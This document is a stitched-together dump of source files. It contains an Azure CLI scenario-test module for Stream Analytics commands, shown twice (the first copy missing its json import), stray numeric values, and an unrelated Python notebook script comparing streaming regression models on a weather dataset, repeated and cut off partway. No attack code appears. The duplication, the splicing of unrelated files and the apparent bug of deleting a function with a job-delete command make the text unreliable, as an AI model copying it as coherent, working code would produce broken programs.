from azure.cli.testsdk import (
ResourceGroupPreparer,
ScenarioTest,
StorageAccountPreparer
)
from azure.cli.testsdk.scenario_tests import AllowLargeResponse
class StreamAnalyticsClientTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_job_crud(self):
self.kwargs.update({
"job_name": "job",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5",
checks=[
self.check("name", "{job_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs")
]
)
# retrieve/update a streaming job
self.cmd(
"stream-analytics job list -g {rg}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{job_name}")
]
)
self.cmd(
"stream-analytics job update -n {job_name} -g {rg} \
--order-max-delay 10 --arrival-max-delay 29"
)
self.cmd(
"stream-analytics job show -n {job_name} -g {rg}",
checks=[
self.check("eventsOutOfOrderMaxDelayInSeconds", 10),
self.check("eventsLateArrivalMaxDelayInSeconds", 29)
]
)
# delete a streaming job
self.cmd("stream-analytics job delete -n {job_name} -g {rg} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_transformation_crud(self):
self.kwargs.update({
"job_name": "job",
"transformation_name": "transformation",
"input_name": "input",
"output_name": "output",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create a transformation
self.kwargs["saql"] = f"SELECT * INTO {self.kwargs['output_name']} FROM {self.kwargs['input_name']}"
self.cmd(
"stream-analytics transformation create -n {transformation_name} -g {rg} \
--job-name {job_name} \
--saql '{saql}' --streaming-units 6",
checks=[
self.check("name", "{transformation_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/transformations")
]
)
# retrieve/update a transformation
self.cmd(
"stream-analytics transformation update -n {transformation_name} -g {rg} \
--job-name {job_name} --saql '{saql}' --streaming-units 3"
)
self.cmd(
"stream-analytics transformation show -n {transformation_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{transformation_name}"),
self.check("streamingUnits", 3)
]
)
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_input_crud(self, storage_account):
self.kwargs.update({
"job_name": "job",
"input_name": "input",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create/test an input
props = {
"type": "Reference",
"datasource": {
"type": "Microsoft.Storage/Blob",
"properties": {
"container": self.kwargs["container"],
"dateFormat": "yyyy/MM/dd",
"pathPattern": "{date}/{time}",
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"timeFormat": "HH"
}
},
"serialization": {
"type": "Csv",
"properties": {
"encoding": "UTF8",
"fieldDelimiter": ","
}
}
}
self.kwargs["properties"] = json.dumps(props)
self.cmd(
"stream-analytics input create -n {input_name} -g {rg} \
--job-name {job_name} \
--properties '{properties}'",
checks=[
self.check("name", "{input_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/inputs")
]
)
self.cmd(
"stream-analytics input test -n {input_name} -g {rg} \
--job-name {job_name} \
--properties '{properties}'",
checks=[
self.check("status", "TestSucceeded")
]
)
# retrieve/update an input
self.cmd(
"stream-analytics input list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{input_name}")
]
)
props["datasource"]["properties"]["dateFormat"] = "MM/dd/yyyy"
self.kwargs["properties"] = json.dumps(props)
self.cmd(
"stream-analytics input update -n {input_name} -g {rg} \
--job-name {job_name} --properties '{properties}'"
)
self.cmd(
"stream-analytics input show -n {input_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{input_name}"),
self.check("properties.datasource.dateFormat", "MM/dd/yyyy")
]
)
# delete an input
self.cmd("stream-analytics input delete -n {input_name} -g {rg} --job-name {job_name} --yes")
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_output_crud(self, storage_account):
self.kwargs.update({
"job_name": "job",
"output_name": "output",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create/test an output
datasource_props = {
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "yyyy/MM/dd",
"timeFormat": "HH"
}
}
serialization_props = {
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
}
self.kwargs["datasource"] = json.dumps(datasource_props)
self.kwargs["serialization"] = json.dumps(serialization_props)
self.cmd(
"stream-analytics output create -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'",
checks=[
self.check("name", "{output_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/outputs")
]
)
self.cmd(
"stream-analytics output test -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'",
checks=[
self.check("status", "TestSucceeded")
]
)
# retrieve/update an output
self.cmd(
"stream-analytics output list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{output_name}")
]
)
datasource_props["properties"]["dateFormat"] = "MM/dd/yyyy"
self.kwargs["datasource"] = json.dumps(datasource_props)
self.cmd(
"stream-analytics output update -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'"
)
self.cmd(
"stream-analytics output show -n {output_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{output_name}"),
self.check("datasource.dateFormat", "MM/dd/yyyy")
]
)
# delete an output
self.cmd("stream-analytics output delete -n {output_name} -g {rg} --job-name {job_name} --yes")
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_job_scale(self, storage_account):
self.kwargs.update({
"job_name": "job",
"transformation_name": "transformation",
"input_name": "input",
"output_name": "output",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create a transformation
self.kwargs["saql"] = f"SELECT * INTO {self.kwargs['output_name']} FROM {self.kwargs['input_name']}"
self.cmd(
"stream-analytics transformation create -n {transformation_name} -g {rg} \
--job-name {job_name} \
--saql '{saql}' --streaming-units 6"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create an input
self.kwargs["properties"] = json.dumps({
"type": "Stream",
"datasource": {
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "MM/dd/yyyy",
"timeFormat": "HH",
"sourcePartitionCount": 16
}
},
"serialization": {
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
}
})
self.cmd(
"stream-analytics input create -n {input_name} -g {rg} \
--job-name {job_name} --properties '{properties}'"
)
# create an output
self.kwargs["datasource"] = json.dumps({
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "yyyy/MM/dd",
"timeFormat": "HH"
}
})
self.kwargs["serialization"] = json.dumps({
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
})
self.cmd(
"stream-analytics output create -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'"
)
# start/stop a running job
self.cmd("stream-analytics job start -n {job_name} -g {rg} --output-start-mode JobStartTime")
self.cmd("stream-analytics job stop -n {job_name} -g {rg}")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_function_crud(self):
self.kwargs.update({
"job_name": "job",
"function_name": "function",
"workspace_name": "workspace",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create/test a function
props = {
"type": "Scalar",
"properties": {
"inputs": [{
"dataType": "Any"
}],
"output": {
"dataType": "Any"
},
"binding": {
"type": "Microsoft.StreamAnalytics/JavascriptUdf",
"properties": {
"script": "function (a, b) { return a + b; }"
}
}
}
}
self.kwargs["props"] = json.dumps(props)
self.cmd(
"stream-analytics function create -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'",
checks=[
self.check("name", "{function_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/functions")
]
)
self.cmd(
"stream-analytics function test -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'",
checks=[
self.check("status", "TestFailed")
]
)
# retrieve/update a function
self.cmd(
"stream-analytics function list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{function_name}")
]
)
props["properties"]["binding"]["properties"]["script"] = "function (a, b) { return a * b; }"
self.kwargs["props"] = json.dumps(props)
self.cmd(
"stream-analytics function update -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'"
)
self.cmd(
"stream-analytics function show -n {function_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{function_name}"),
self.check("properties.binding.script", "function (a, b) {{ return a * b; }}")
]
)
# delete a function
self.cmd("stream-analytics job delete -n {function_name} -g {rg} --job-name {job_name} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
def test_subscription_inspect(self):
self.kwargs.update({
"location": "westus"
})
self.cmd(
"stream-analytics subscription inspect -l {location}",
checks=[
self.check("length(value)", 2),
self.check("value[0].type", "Microsoft.StreamAnalytics/quotas")
]
)
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
def test_cluster_crud(self):
self.kwargs.update({
"cluster": "cli-cluster",
"capacity1": 36,
"capacity2": 72,
})
# create a cluster
self.cmd(
"stream-analytics cluster create -n {cluster} -g {rg} --sku name=Default capacity={capacity1}",
checks=[
self.check("sku.capacity", 36),
self.check("type", "Microsoft.StreamAnalytics/clusters"),
]
)
# retrieve/update a cluster
self.cmd(
"stream-analytics cluster list -g {rg}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{cluster}"),
]
)
self.cmd("stream-analytics cluster update -n {cluster} -g {rg} --sku capacity={capacity2}")
self.cmd(
"stream-analytics cluster show -n {cluster} -g {rg}",
checks=[
self.check("sku.capacity", 72),
self.check("name", "{cluster}"),
]
)
# delete a cluster
self.cmd("stream-analytics cluster delete -n {cluster} -g {rg} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
@StorageAccountPreparer(name_prefix="pl", kind="StorageV2")
def test_private_endpoint_crud(self, storage_account):
self.kwargs.update({
"sa": storage_account,
"pe": "cli-pe",
"cluster": "cli-cluster",
})
self.cmd("stream-analytics cluster create -n {cluster} -g {rg} --sku name=Default capacity=36")
# prepare connections
self.kwargs["sa_id"] = self.cmd('storage account show -n {sa} -g {rg}').get_output_in_json()["id"]
self.kwargs["group_id"] = self.cmd("storage account private-link-resource list -g {rg} \
--account-name {sa}").get_output_in_json()[0]["groupId"]
self.kwargs["connections"] = json.dumps([{
"privateLinkServiceId": self.kwargs["sa_id"],
"groupIds": [self.kwargs["group_id"]]
}])
self.cmd(
"stream-analytics private-endpoint create -n {pe} -g {rg} \
--cluster-name {cluster} --connections '{connections}'",
checks=[
self.check("name", "{pe}"),
self.check("type", "Microsoft.StreamAnalytics/clusters/privateEndpoints"),
]
)
self.cmd(
"stream-analytics private-endpoint list -g {rg} --cluster-name {cluster}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{pe}"),
]
)
self.cmd(
"stream-analytics private-endpoint show -n {pe} -g {rg} --cluster-name {cluster}",
checks=[
self.check("name", "{pe}"),
self.check("type", "Microsoft.StreamAnalytics/clusters/privateEndpoints"),
]
)
self.cmd("stream-analytics private-endpoint delete -n {pe} -g {rg} --cluster-name {cluster} --yes")
|
src/stream-analytics/azext_stream_analytics/tests/latest/test_stream_analytics_commands.py
|
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
import json
from azure.cli.testsdk import (
ResourceGroupPreparer,
ScenarioTest,
StorageAccountPreparer
)
from azure.cli.testsdk.scenario_tests import AllowLargeResponse
class StreamAnalyticsClientTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_job_crud(self):
self.kwargs.update({
"job_name": "job",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5",
checks=[
self.check("name", "{job_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs")
]
)
# retrieve/update a streaming job
self.cmd(
"stream-analytics job list -g {rg}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{job_name}")
]
)
self.cmd(
"stream-analytics job update -n {job_name} -g {rg} \
--order-max-delay 10 --arrival-max-delay 29"
)
self.cmd(
"stream-analytics job show -n {job_name} -g {rg}",
checks=[
self.check("eventsOutOfOrderMaxDelayInSeconds", 10),
self.check("eventsLateArrivalMaxDelayInSeconds", 29)
]
)
# delete a streaming job
self.cmd("stream-analytics job delete -n {job_name} -g {rg} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_transformation_crud(self):
self.kwargs.update({
"job_name": "job",
"transformation_name": "transformation",
"input_name": "input",
"output_name": "output",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create a transformation
self.kwargs["saql"] = f"SELECT * INTO {self.kwargs['output_name']} FROM {self.kwargs['input_name']}"
self.cmd(
"stream-analytics transformation create -n {transformation_name} -g {rg} \
--job-name {job_name} \
--saql '{saql}' --streaming-units 6",
checks=[
self.check("name", "{transformation_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/transformations")
]
)
# retrieve/update a transformation
self.cmd(
"stream-analytics transformation update -n {transformation_name} -g {rg} \
--job-name {job_name} --saql '{saql}' --streaming-units 3"
)
self.cmd(
"stream-analytics transformation show -n {transformation_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{transformation_name}"),
self.check("streamingUnits", 3)
]
)
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_input_crud(self, storage_account):
self.kwargs.update({
"job_name": "job",
"input_name": "input",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create/test an input
props = {
"type": "Reference",
"datasource": {
"type": "Microsoft.Storage/Blob",
"properties": {
"container": self.kwargs["container"],
"dateFormat": "yyyy/MM/dd",
"pathPattern": "{date}/{time}",
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"timeFormat": "HH"
}
},
"serialization": {
"type": "Csv",
"properties": {
"encoding": "UTF8",
"fieldDelimiter": ","
}
}
}
self.kwargs["properties"] = json.dumps(props)
self.cmd(
"stream-analytics input create -n {input_name} -g {rg} \
--job-name {job_name} \
--properties '{properties}'",
checks=[
self.check("name", "{input_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/inputs")
]
)
self.cmd(
"stream-analytics input test -n {input_name} -g {rg} \
--job-name {job_name} \
--properties '{properties}'",
checks=[
self.check("status", "TestSucceeded")
]
)
# retrieve/update an input
self.cmd(
"stream-analytics input list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{input_name}")
]
)
props["datasource"]["properties"]["dateFormat"] = "MM/dd/yyyy"
self.kwargs["properties"] = json.dumps(props)
self.cmd(
"stream-analytics input update -n {input_name} -g {rg} \
--job-name {job_name} --properties '{properties}'"
)
self.cmd(
"stream-analytics input show -n {input_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{input_name}"),
self.check("properties.datasource.dateFormat", "MM/dd/yyyy")
]
)
# delete an input
self.cmd("stream-analytics input delete -n {input_name} -g {rg} --job-name {job_name} --yes")
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_output_crud(self, storage_account):
self.kwargs.update({
"job_name": "job",
"output_name": "output",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create/test an output
datasource_props = {
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "yyyy/MM/dd",
"timeFormat": "HH"
}
}
serialization_props = {
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
}
self.kwargs["datasource"] = json.dumps(datasource_props)
self.kwargs["serialization"] = json.dumps(serialization_props)
self.cmd(
"stream-analytics output create -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'",
checks=[
self.check("name", "{output_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/outputs")
]
)
self.cmd(
"stream-analytics output test -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'",
checks=[
self.check("status", "TestSucceeded")
]
)
# retrieve/update an output
self.cmd(
"stream-analytics output list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{output_name}")
]
)
datasource_props["properties"]["dateFormat"] = "MM/dd/yyyy"
self.kwargs["datasource"] = json.dumps(datasource_props)
self.cmd(
"stream-analytics output update -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'"
)
self.cmd(
"stream-analytics output show -n {output_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{output_name}"),
self.check("datasource.dateFormat", "MM/dd/yyyy")
]
)
# delete an output
self.cmd("stream-analytics output delete -n {output_name} -g {rg} --job-name {job_name} --yes")
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_job_scale(self, storage_account):
self.kwargs.update({
"job_name": "job",
"transformation_name": "transformation",
"input_name": "input",
"output_name": "output",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create a transformation
self.kwargs["saql"] = f"SELECT * INTO {self.kwargs['output_name']} FROM {self.kwargs['input_name']}"
self.cmd(
"stream-analytics transformation create -n {transformation_name} -g {rg} \
--job-name {job_name} \
--saql '{saql}' --streaming-units 6"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create an input
self.kwargs["properties"] = json.dumps({
"type": "Stream",
"datasource": {
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "MM/dd/yyyy",
"timeFormat": "HH",
"sourcePartitionCount": 16
}
},
"serialization": {
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
}
})
self.cmd(
"stream-analytics input create -n {input_name} -g {rg} \
--job-name {job_name} --properties '{properties}'"
)
# create an output
self.kwargs["datasource"] = json.dumps({
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "yyyy/MM/dd",
"timeFormat": "HH"
}
})
self.kwargs["serialization"] = json.dumps({
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
})
self.cmd(
"stream-analytics output create -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'"
)
# start/stop a running job
self.cmd("stream-analytics job start -n {job_name} -g {rg} --output-start-mode JobStartTime")
self.cmd("stream-analytics job stop -n {job_name} -g {rg}")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_function_crud(self):
self.kwargs.update({
"job_name": "job",
"function_name": "function",
"workspace_name": "workspace",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create/test a function
props = {
"type": "Scalar",
"properties": {
"inputs": [{
"dataType": "Any"
}],
"output": {
"dataType": "Any"
},
"binding": {
"type": "Microsoft.StreamAnalytics/JavascriptUdf",
"properties": {
"script": "function (a, b) { return a + b; }"
}
}
}
}
self.kwargs["props"] = json.dumps(props)
self.cmd(
"stream-analytics function create -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'",
checks=[
self.check("name", "{function_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/functions")
]
)
self.cmd(
"stream-analytics function test -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'",
checks=[
self.check("status", "TestFailed")
]
)
# retrieve/update a function
self.cmd(
"stream-analytics function list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{function_name}")
]
)
props["properties"]["binding"]["properties"]["script"] = "function (a, b) { return a * b; }"
self.kwargs["props"] = json.dumps(props)
self.cmd(
"stream-analytics function update -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'"
)
self.cmd(
"stream-analytics function show -n {function_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{function_name}"),
self.check("properties.binding.script", "function (a, b) {{ return a * b; }}")
]
)
# delete a function
self.cmd("stream-analytics job delete -n {function_name} -g {rg} --job-name {job_name} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
def test_subscription_inspect(self):
self.kwargs.update({
"location": "westus"
})
self.cmd(
"stream-analytics subscription inspect -l {location}",
checks=[
self.check("length(value)", 2),
self.check("value[0].type", "Microsoft.StreamAnalytics/quotas")
]
)
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
def test_cluster_crud(self):
self.kwargs.update({
"cluster": "cli-cluster",
"capacity1": 36,
"capacity2": 72,
})
# create a cluster
self.cmd(
"stream-analytics cluster create -n {cluster} -g {rg} --sku name=Default capacity={capacity1}",
checks=[
self.check("sku.capacity", 36),
self.check("type", "Microsoft.StreamAnalytics/clusters"),
]
)
# retrieve/update a cluster
self.cmd(
"stream-analytics cluster list -g {rg}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{cluster}"),
]
)
self.cmd("stream-analytics cluster update -n {cluster} -g {rg} --sku capacity={capacity2}")
self.cmd(
"stream-analytics cluster show -n {cluster} -g {rg}",
checks=[
self.check("sku.capacity", 72),
self.check("name", "{cluster}"),
]
)
# delete a cluster
self.cmd("stream-analytics cluster delete -n {cluster} -g {rg} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
@StorageAccountPreparer(name_prefix="pl", kind="StorageV2")
def test_private_endpoint_crud(self, storage_account):
self.kwargs.update({
"sa": storage_account,
"pe": "cli-pe",
"cluster": "cli-cluster",
})
self.cmd("stream-analytics cluster create -n {cluster} -g {rg} --sku name=Default capacity=36")
# prepare connections
self.kwargs["sa_id"] = self.cmd('storage account show -n {sa} -g {rg}').get_output_in_json()["id"]
self.kwargs["group_id"] = self.cmd("storage account private-link-resource list -g {rg} \
--account-name {sa}").get_output_in_json()[0]["groupId"]
self.kwargs["connections"] = json.dumps([{
"privateLinkServiceId": self.kwargs["sa_id"],
"groupIds": [self.kwargs["group_id"]]
}])
self.cmd(
"stream-analytics private-endpoint create -n {pe} -g {rg} \
--cluster-name {cluster} --connections '{connections}'",
checks=[
self.check("name", "{pe}"),
self.check("type", "Microsoft.StreamAnalytics/clusters/privateEndpoints"),
]
)
self.cmd(
"stream-analytics private-endpoint list -g {rg} --cluster-name {cluster}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{pe}"),
]
)
self.cmd(
"stream-analytics private-endpoint show -n {pe} -g {rg} --cluster-name {cluster}",
checks=[
self.check("name", "{pe}"),
self.check("type", "Microsoft.StreamAnalytics/clusters/privateEndpoints"),
]
)
self.cmd("stream-analytics private-endpoint delete -n {pe} -g {rg} --cluster-name {cluster} --yes")
| 0.52342 | 0.177597 |
#%%
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.preprocessing import MinMaxScaler
from skmultiflow.data import DataStream
from skmultiflow.evaluation import EvaluatePrequential
from skmultiflow.trees import RegressionHAT, RegressionHoeffdingTree
import samknnreg
from importlib import reload
from samknnreg import SAMKNNRegressor
import matplotlib.pyplot as plt
#%%
print("Reading dataset...")
df = pd.read_csv(
"weatherHistory.csv",
parse_dates={"datetime": ["Formatted Date"]},
date_parser=pd.to_datetime,
index_col="datetime")
print("done!")
#%%
df.index = pd.to_datetime(df.index, utc=True)
df. drop(columns=["Summary", "Precip Type", "Daily Summary", "Loud Cover"], inplace=True, errors="ignore")
df.info()
#%%
df.head()
#%%
scaler = MinMaxScaler()
tdf = pd.DataFrame(scaler.fit_transform(df.values), columns=df.columns.copy(), index=df.index)
#%%
fig, ax = plt.subplots(ncols=2)
df.drop(columns=["Pressure (millibars)", "Wind Bearing (degrees)"]).resample("W").mean().plot(ax=ax[0], title="unscaled")
tdf.drop(columns=["Pressure (millibars)", "Wind Bearing (degrees)"]).resample("W").mean().plot(ax=ax[1], title="scaled")
#%%
tdf.info()
X = tdf[["Pressure (millibars)", "Humidity", "Wind Speed (km/h)"]].resample("6H").mean()
y = tdf[["Temperature (C)"]].resample("6H").max()
X.plot(subplots=True, layout=(1,3))
y.plot()
#%%
reload(samknnreg)
from samknnreg import SAMKNNRegressor
sam = SAMKNNRegressor()
hat = RegressionHAT()
rht = RegressionHoeffdingTree()
ds = DataStream(X, y=y)
ds.prepare_for_use()
evaluator = EvaluatePrequential(show_plot=True,
n_wait=730,
batch_size=28,
metrics=[
'mean_square_error',
'true_vs_predicted'])
#%%
evaluator.evaluate(
stream=ds,
model=[sam, rht, hat ],
model_names=["SAM", "Hoeffding Tree Regressor", "Hoeffding Tree Regressor (Adaptive)"])
#%%
|
dataset.py
|
#%%
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.preprocessing import MinMaxScaler
from skmultiflow.data import DataStream
from skmultiflow.evaluation import EvaluatePrequential
from skmultiflow.trees import RegressionHAT, RegressionHoeffdingTree
import samknnreg
from importlib import reload
from samknnreg import SAMKNNRegressor
import matplotlib.pyplot as plt
#%%
print("Reading dataset...")
df = pd.read_csv(
"weatherHistory.csv",
parse_dates={"datetime": ["Formatted Date"]},
date_parser=pd.to_datetime,
index_col="datetime")
print("done!")
#%%
df.index = pd.to_datetime(df.index, utc=True)
df. drop(columns=["Summary", "Precip Type", "Daily Summary", "Loud Cover"], inplace=True, errors="ignore")
df.info()
#%%
df.head()
#%%
scaler = MinMaxScaler()
